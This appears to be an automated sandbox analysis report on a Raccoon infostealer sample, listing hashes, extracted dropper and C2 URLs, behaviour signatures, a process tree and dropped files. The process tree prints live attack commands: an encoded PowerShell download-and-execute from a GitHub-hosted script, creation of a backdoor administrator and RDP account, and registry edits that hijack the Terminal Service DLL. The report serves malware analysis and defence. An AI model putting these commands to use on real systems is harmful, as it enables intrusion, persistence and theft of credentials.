Analysis

  • max time kernel
    64s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02-06-2021 17:28

General

  • Target

    16f8d65303b998ddec384ba2f9382ad8.exe

  • Size

    569KB

  • MD5

    16f8d65303b998ddec384ba2f9382ad8

  • SHA1

    0670a1f15e93fb73c82776c048c8e3df941f57ad

  • SHA256

    4e0cca88ac33e671cd7cc9689605b8830d03ad80e39e716516381499be1c906a

  • SHA512

    6b3e40d86193bfa0222295d5731ce9ed69e785f431beb557463951490d1934045b9b43a6ac86a869536b5483303812da9ad78058609740c5090a4b50c271c2de

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

raccoon

Botnet

e46634757936706c1ff491585768dd6fe231db30

Attributes
  • url4cnc

    https://tttttt.me/jdiamond13

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16f8d65303b998ddec384ba2f9382ad8.exe
    "C:\Users\Admin\AppData\Local\Temp\16f8d65303b998ddec384ba2f9382ad8.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Users\Admin\AppData\Local\Temp\i1JKbCUHDu.exe
      "C:\Users\Admin\AppData\Local\Temp\i1JKbCUHDu.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oivafain\oivafain.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5DC5.tmp" "c:\Users\Admin\AppData\Local\Temp\oivafain\CSC44ECAA03BC464D8BBD8776C68DF7CA.TMP"
            5⤵
              PID:4064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1480
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3720
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:3940
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              4⤵
              • Modifies registry key
              PID:3876
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              4⤵
                PID:1840
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:208
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  5⤵
                    PID:1752
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3864
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:684
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1464
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        7⤵
                          PID:2268
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3284
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3264
                      • C:\Windows\system32\net.exe
                        net start TermService
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3736
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start TermService
                          7⤵
                            PID:3136
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                      4⤵
                        PID:3408
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                        4⤵
                          PID:3568
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\16f8d65303b998ddec384ba2f9382ad8.exe"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2976
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        3⤵
                        • Delays execution with timeout.exe
                        PID:2144
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1480
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3904
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:1556
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc 2iRY27Ot /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3428
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc 2iRY27Ot /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:192
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc 2iRY27Ot /add
                          3⤵
                            PID:3424
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4044
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3864
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:1752
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3892
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3900
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                              3⤵
                                PID:3980
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:956
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                                PID:2408
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                  3⤵
                                    PID:3428
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user wgautilacc 2iRY27Ot
                                1⤵
                                  PID:2604
                                  • C:\Windows\system32\net.exe
                                    net.exe user wgautilacc 2iRY27Ot
                                    2⤵
                                      PID:3864
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user wgautilacc 2iRY27Ot
                                        3⤵
                                          PID:4044
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C wmic path win32_VideoController get name
                                      1⤵
                                        PID:3720
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic path win32_VideoController get name
                                          2⤵
                                            PID:3876
                                        • C:\Windows\System32\cmd.exe
                                          cmd.exe /C wmic CPU get NAME
                                          1⤵
                                            PID:1312
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic CPU get NAME
                                              2⤵
                                                PID:956
                                            • C:\Windows\System32\cmd.exe
                                              cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              1⤵
                                                PID:1464
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                  2⤵
                                                    PID:4044
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                      3⤵
                                                      • Blocklisted process makes network request
                                                      • Drops file in Program Files directory
                                                      • Drops file in Windows directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:748
                                                • C:\Windows\System32\cmd.exe
                                                  cmd.exe /C net user wgautilacc 1234
                                                  1⤵
                                                    PID:956
                                                    • C:\Windows\system32\net.exe
                                                      net user wgautilacc 1234
                                                      2⤵
                                                        PID:512
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 user wgautilacc 1234
                                                          3⤵
                                                            PID:3888

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Persistence

                                                      Account Manipulation

                                                      1
                                                      T1098

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1060

                                                      Defense Evasion

                                                      Modify Registry

                                                      2
                                                      T1112

                                                      Credential Access

                                                      Credentials in Files

                                                      2
                                                      T1081

                                                      Discovery

                                                      Query Registry

                                                      1
                                                      T1012

                                                      System Information Discovery

                                                      1
                                                      T1082

                                                      Lateral Movement

                                                      Remote Desktop Protocol

                                                      1
                                                      T1076

                                                      Collection

                                                      Data from Local System

                                                      2
                                                      T1005

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
                                                        MD5

                                                        4d0cb7fa714bb6b8b113319c5f37734d

                                                        SHA1

                                                        78fb1052d8fa35592e0f6103378658478c8d1385

                                                        SHA256

                                                        469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845

                                                        SHA512

                                                        b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c

                                                      • C:\Users\Admin\AppData\Local\Temp\RES5DC5.tmp
                                                        MD5

                                                        ae5cc378fc27485732a4462ba3fd2253

                                                        SHA1

                                                        f85b796cad0f9e8d94a25b74d65cb1ee98bb3465

                                                        SHA256

                                                        150f4aa87bcf9ede47df28a5fc02fbb3b9e09953085633e1ec68cb563e7b4c50

                                                        SHA512

                                                        c702041bd9380bf81b4a9a1074432a8fcd51034322d25d00778989da1888af243ef253479f6a04b6a7e2960108af19af34a669baf9c99a11972a88ecbc661784

                                                      • C:\Users\Admin\AppData\Local\Temp\i1JKbCUHDu.exe
                                                        MD5

                                                        c2ac724339045f253306ae9ab38cbf4f

                                                        SHA1

                                                        c6abd5edb40444ce3fbc8564051545161cd85495

                                                        SHA256

                                                        d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a

                                                        SHA512

                                                        b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58

                                                      • C:\Users\Admin\AppData\Local\Temp\i1JKbCUHDu.exe
                                                        MD5

                                                        c2ac724339045f253306ae9ab38cbf4f

                                                        SHA1

                                                        c6abd5edb40444ce3fbc8564051545161cd85495

                                                        SHA256

                                                        d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a

                                                        SHA512

                                                        b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58

                                                      • C:\Users\Admin\AppData\Local\Temp\oivafain\oivafain.dll
                                                        MD5

                                                        ee4c5f7441e14352f3b2599c037360e5

                                                        SHA1

                                                        69feb8f3b83c29da7354fc0cd7cca8ddd0e93db3

                                                        SHA256

                                                        c70c2831e84a02d1b668cab3f916b7a0bf891d6e43c9422d397ddc7f8b39d1ea

                                                        SHA512

                                                        040750dc9fd8ef97ff4f35671d0adc2c52950720c7f830d878c136f98377429a5199164977e72507fd9980cd2c9f1b6cbe76582e0ea086f0d879ee44e56b8bef

                                                      • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                        MD5

                                                        065cc96fec70546c9f195f703e4d657b

                                                        SHA1

                                                        9da24636d8fd3de61f46ff7282640d3fa27d6b45

                                                        SHA256

                                                        cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3

                                                        SHA512

                                                        a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0

                                                      • \??\c:\Users\Admin\AppData\Local\Temp\oivafain\CSC44ECAA03BC464D8BBD8776C68DF7CA.TMP
                                                        MD5

                                                        936796fb6743bfb301f8f17a9ee7c8e1

                                                        SHA1

                                                        964312aaa4da33c8859d5b7a28909ff6982d6bd3

                                                        SHA256

                                                        210f7533a34e93897fe3654684405dc275411b5a10c0a4b2f5c8e0fc429777a7

                                                        SHA512

                                                        5838443f026706c0f7b8450fdb4f2805f331ddb7a23877322879597739aa6fc1abdb7e5519c976f4de4a7a2b9d8a9fd5c8b23f217f03028fdaf3a0c89730a835

                                                      • \??\c:\Users\Admin\AppData\Local\Temp\oivafain\oivafain.0.cs
                                                        MD5

                                                        df390bc8a088b51d27253fed32186361

                                                        SHA1

                                                        69e6a59300fc04ef5ab53cbe061b8b2aefe375a4

                                                        SHA256

                                                        4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f

                                                        SHA512

                                                        4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8

                                                      • \??\c:\Users\Admin\AppData\Local\Temp\oivafain\oivafain.cmdline
                                                        MD5

                                                        b82cdc42dbbce1160dba4c23f292794f

                                                        SHA1

                                                        8d8908e0a5d83fe149a4e9aafe21cf01f11f492e

                                                        SHA256

                                                        cbccefdc39215e5e63bb3a4070ee884c6edb7265e99712801924571628e439ce

                                                        SHA512

                                                        d734f1cdca5ad51e1a4f89807a5d6850787a576d53f70f9e990ee2c7f38aaecdf22ff695d4956cb5ee3fc3b24d08128095ff8baa6f93aa48ca1f642e475636ab

                                                      • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                        MD5

                                                        60acd24430204ad2dc7f148b8cfe9bdc

                                                        SHA1

                                                        989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                        SHA256

                                                        9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                        SHA512

                                                        626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                      • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                        MD5

                                                        60acd24430204ad2dc7f148b8cfe9bdc

                                                        SHA1

                                                        989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                        SHA256

                                                        9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                        SHA512

                                                        626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                      • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
                                                        MD5

                                                        eae9273f8cdcf9321c6c37c244773139

                                                        SHA1

                                                        8378e2a2f3635574c106eea8419b5eb00b8489b0

                                                        SHA256

                                                        a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                                                        SHA512

                                                        06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                                                      • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
                                                        MD5

                                                        02cc7b8ee30056d5912de54f1bdfc219

                                                        SHA1

                                                        a6923da95705fb81e368ae48f93d28522ef552fb

                                                        SHA256

                                                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                                                        SHA512

                                                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                                                      • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
                                                        MD5

                                                        4e8df049f3459fa94ab6ad387f3561ac

                                                        SHA1

                                                        06ed392bc29ad9d5fc05ee254c2625fd65925114

                                                        SHA256

                                                        25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                                                        SHA512

                                                        3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                                                      • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                        MD5

                                                        f964811b68f9f1487c2b41e1aef576ce

                                                        SHA1

                                                        b423959793f14b1416bc3b7051bed58a1034025f

                                                        SHA256

                                                        83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                        SHA512

                                                        565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                      • \Windows\Branding\mediasrv.png
                                                        MD5

                                                        ee8186ae8d2615ee4a859007556227ec

                                                        SHA1

                                                        0125a0caaf2ff3da1266f1893cf051ddca6460fa

                                                        SHA256

                                                        96de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f

                                                        SHA512

                                                        2eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612

                                                      • \Windows\Branding\mediasvc.png
                                                        MD5

                                                        7a8bf878d6438e28822cb499cb7da107

                                                        SHA1

                                                        36cbc7c1b2da094b773614d251704e4c2bb0e88e

                                                        SHA256

                                                        9aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63

                                                        SHA512

                                                        6c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee

                                                      • memory/192-241-0x0000000000000000-mapping.dmp
                                                      • memory/208-227-0x0000000000000000-mapping.dmp
                                                      • memory/428-122-0x0000000000000000-mapping.dmp
                                                      • memory/428-129-0x00000191DF740000-0x00000191DF742000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/428-127-0x00000191DFB80000-0x00000191DFFA1000-memory.dmp
                                                        Filesize

                                                        4.1MB

                                                      • memory/428-132-0x00000191DF746000-0x00000191DF747000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/428-130-0x00000191DF743000-0x00000191DF745000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/428-131-0x00000191DF745000-0x00000191DF746000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/512-259-0x0000000000000000-mapping.dmp
                                                      • memory/684-230-0x0000000000000000-mapping.dmp
                                                      • memory/748-255-0x000001DDD40D0000-0x000001DDD40D2000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/748-254-0x0000000000000000-mapping.dmp
                                                      • memory/748-257-0x000001DDD40D6000-0x000001DDD40D8000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/748-258-0x000001DDD40D8000-0x000001DDD40D9000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/748-256-0x000001DDD40D3000-0x000001DDD40D5000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/956-252-0x0000000000000000-mapping.dmp
                                                      • memory/1464-231-0x0000000000000000-mapping.dmp
                                                      • memory/1480-217-0x00000194ED8A6000-0x00000194ED8A8000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/1480-218-0x00000194ED8A8000-0x00000194ED8AA000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/1480-212-0x0000000000000000-mapping.dmp
                                                      • memory/1480-214-0x00000194ED8A0000-0x00000194ED8A2000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/1480-215-0x00000194ED8A3000-0x00000194ED8A5000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/1556-240-0x0000000000000000-mapping.dmp
                                                      • memory/1752-244-0x0000000000000000-mapping.dmp
                                                      • memory/1752-228-0x0000000000000000-mapping.dmp
                                                      • memory/1840-226-0x0000000000000000-mapping.dmp
                                                      • memory/1928-150-0x0000000000000000-mapping.dmp
                                                      • memory/2144-126-0x0000000000000000-mapping.dmp
                                                      • memory/2268-232-0x0000000000000000-mapping.dmp
                                                      • memory/2408-247-0x0000000000000000-mapping.dmp
                                                      • memory/2676-223-0x00000217B9F28000-0x00000217B9F29000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-133-0x0000000000000000-mapping.dmp
                                                      • memory/2676-165-0x00000217BA890000-0x00000217BA891000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-144-0x00000217B9F23000-0x00000217B9F25000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/2676-138-0x00000217A0140000-0x00000217A0141000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-143-0x00000217B9F20000-0x00000217B9F22000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/2676-141-0x00000217BA0B0000-0x00000217BA0B1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-157-0x00000217B9EF0000-0x00000217B9EF1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-164-0x00000217BA500000-0x00000217BA501000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/2676-159-0x00000217B9F26000-0x00000217B9F28000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/2976-124-0x0000000000000000-mapping.dmp
                                                      • memory/3136-236-0x0000000000000000-mapping.dmp
                                                      • memory/3264-234-0x0000000000000000-mapping.dmp
                                                      • memory/3284-233-0x0000000000000000-mapping.dmp
                                                      • memory/3408-261-0x0000000000000000-mapping.dmp
                                                      • memory/3424-115-0x0000000000400000-0x0000000000496000-memory.dmp
                                                        Filesize

                                                        600KB

                                                      • memory/3424-242-0x0000000000000000-mapping.dmp
                                                      • memory/3424-114-0x0000000002110000-0x00000000021A1000-memory.dmp
                                                        Filesize

                                                        580KB

                                                      • memory/3428-248-0x0000000000000000-mapping.dmp
                                                      • memory/3568-262-0x0000000000000000-mapping.dmp
                                                      • memory/3720-221-0x0000027177496000-0x0000027177498000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3720-216-0x0000000000000000-mapping.dmp
                                                      • memory/3720-219-0x0000027177490000-0x0000027177492000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3720-220-0x0000027177493000-0x0000027177495000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3720-222-0x0000027177498000-0x000002717749A000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3736-235-0x0000000000000000-mapping.dmp
                                                      • memory/3748-183-0x000002A529DD3000-0x000002A529DD5000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3748-182-0x000002A529DD0000-0x000002A529DD2000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3748-202-0x000002A529DD6000-0x000002A529DD8000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3748-213-0x000002A529DD8000-0x000002A529DDA000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3748-173-0x0000000000000000-mapping.dmp
                                                      • memory/3864-249-0x0000000000000000-mapping.dmp
                                                      • memory/3864-229-0x0000000000000000-mapping.dmp
                                                      • memory/3864-243-0x0000000000000000-mapping.dmp
                                                      • memory/3876-225-0x0000000000000000-mapping.dmp
                                                      • memory/3876-251-0x0000000000000000-mapping.dmp
                                                      • memory/3888-260-0x0000000000000000-mapping.dmp
                                                      • memory/3900-245-0x0000000000000000-mapping.dmp
                                                      • memory/3904-239-0x0000000000000000-mapping.dmp
                                                      • memory/3940-224-0x0000000000000000-mapping.dmp
                                                      • memory/3980-246-0x0000000000000000-mapping.dmp
                                                      • memory/4044-253-0x0000000000000000-mapping.dmp
                                                      • memory/4044-250-0x0000000000000000-mapping.dmp
                                                      • memory/4064-153-0x0000000000000000-mapping.dmp